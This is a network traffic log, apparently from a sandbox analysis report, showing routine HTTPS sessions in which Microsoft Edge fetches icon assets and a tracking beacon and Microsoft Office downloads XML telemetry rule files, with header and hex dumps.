2024-11-10 03:55:24 UTC	4944	IN	Data Raw: f7 52 13 58 62 fb e9 21 5b 75 03 17 1c 54 6d 19 c9 a8 68 28 42 9d 72 18 59 2e 37 2a 0c 62 39 95 49 f4 d3 4f 3f dd 5c 95 c7 7f 5e 26 47 55 66 a3 ea 36 56 f1 51 09 75 c5 13 0a 63 96 51 3e 61 c6 4e 30 31 02 fb 25 ac ba ef f1 51 a3 42 71 d6 c4 60 4d d0 b4 22 a3 45 5b 46 7d 48 2d fb 24 ab b3 11 2c 12 46 4c d6 28 60 28 2f fd 89 ad 4e 3b ed b4 70 0a 37 30 5d 55 33 e8 8b ab f4 61 23 b0 4f 04 f6 4b 58 2e 2f c8 4a 25 4c 43 94 67 ef b3 5a 9d fd c0 11 18 09 68 2c 3c 41 d3 0e 86 ab 53 52 ba 3f f9 a6 85 af a7 7b ea 87 ad bc 55 63 45 55 e2 a9 dc ba b0 55 85 57 e3 55 5a 6e 04 0e 04 81 03 20 ac 72 d0 12 0e a4 66 5d c8 c1 22 50 bc b3 28 36 fa d0 96 53 95 ac 04 4a 67 05 4d 1e e7 99 a2 fa ae ef fa 2e 2f d3 58 05 2a c8 0a 49 b9 63 89 ac 13 61 49 46 40 5b 8b 77 92 17 17 ed c3 Data Ascii: RXb![uTmh(BrY.7b9IO?\^&GUf6VQucQ>aN01%QBq`M"E[F}H-$,FL(`(/N;p70]U3a#OKX./J%LCgZh,<ASR?{UcEUUWUZn rf]"P(6SJgM./XIcaIF@[w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	49838	13.107.246.57	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	431	OUT	GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	536	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: image/png Content-Length: 1966 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT ETag: 0x8DBDCB5EC122A94 x-ms-request-id: 7552d3c1-901e-0069-3dcc-3237ab000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241110T035524Z-17df447cdb5km9skhC1DFWy2rc00000008s0000000006k9e Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:24 UTC	1966	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNntw<T:A-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	49836	13.107.246.57	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	433	OUT	GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	543	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: image/png Content-Length: 1751 Connection: close Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT ETag: 0x8DBCEA8D5AACC85 x-ms-request-id: b18e1dbb-901e-000f-6849-3285f1000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241110T035524Z-15869dbbcc6tfpj2hC1DFW384c00000005sg00000000hqpe Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-10 03:55:24 UTC	1751	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	49837	13.107.246.57	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	433	OUT	GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	536	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: image/png Content-Length: 1427 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT ETag: 0x8DBDCB5EF021F8E x-ms-request-id: e547d122-d01e-0008-0bc6-2e7374000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241110T035524Z-16547b76f7flf9g6hC1DFWmcx800000002gg00000000t063 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:24 UTC	1427	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	49839	13.107.246.57	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	430	OUT	GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	536	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: image/png Content-Length: 2008 Connection: close Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT ETag: 0x8DBC9B5C0C17219 x-ms-request-id: 794c108b-001e-000a-0ab4-2e718e000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241110T035524Z-16547b76f7f22sh5hC1DFWyb4w0000000bx000000000pud8 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:24 UTC	2008	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*\|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	49840	13.107.246.57	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	422	OUT	GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:24 UTC	543	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: image/png Content-Length: 2229 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT ETag: 0x8DBD59359A9E77B x-ms-request-id: 1e488ba8-701e-0005-0549-329c78000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241110T035524Z-15869dbbcc6sg5zbhC1DFWy5u8000000044g000000003z6b Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-10 03:55:24 UTC	2229	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49850	108.156.245.115	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	1012	OUT	GET /b2?rn=1731210922530&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1C457A5C69C96D7328066F6F68476CEB&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=12E432c46d4b1e2524559821731210924; XID=12E432c46d4b1e2524559821731210924
2024-11-10 03:55:25 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Sun, 10 Nov 2024 03:55:24 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 4e5957bb5ae6faf93b269753f180710a.cloudfront.net (CloudFront) X-Amz-Cf-Pop: DFW56-P5 X-Amz-Cf-Id: 6iAPjoBdxSf4HwbBvzamf-9kK4IFQix-tqrIur2ipQC33GxwrjGgXw==

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.5	49847	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 891841ce-c01e-0014-6d8e-2da6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035524Z-15869dbbcc6pfq2ghC1DFWmp1400000005eg000000005dcy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:25 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.5	49848	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:24 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: bdabee23-f01e-00aa-7a62-328521000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035524Z-15869dbbcc6tfpj2hC1DFW384c00000005u000000000dyq8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:25 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.5	49849	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:24 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:25 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: b9e1ee05-801e-00a0-0660-2e2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035525Z-17df447cdb5qkskwhC1DFWeeg400000008pg00000000br32 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:25 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.5	49851	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:25 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:25 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:25 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 1d5973b4-701e-0050-2a24-326767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035525Z-16547b76f7fcrtpchC1DFW52e80000000c3000000000g5ce x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:25 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.5	49852	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:25 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:25 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 11f32c1c-b01e-003d-4c5c-2ed32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035525Z-15869dbbcc6b2ncxhC1DFWu4ss00000002ng00000000f8vg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
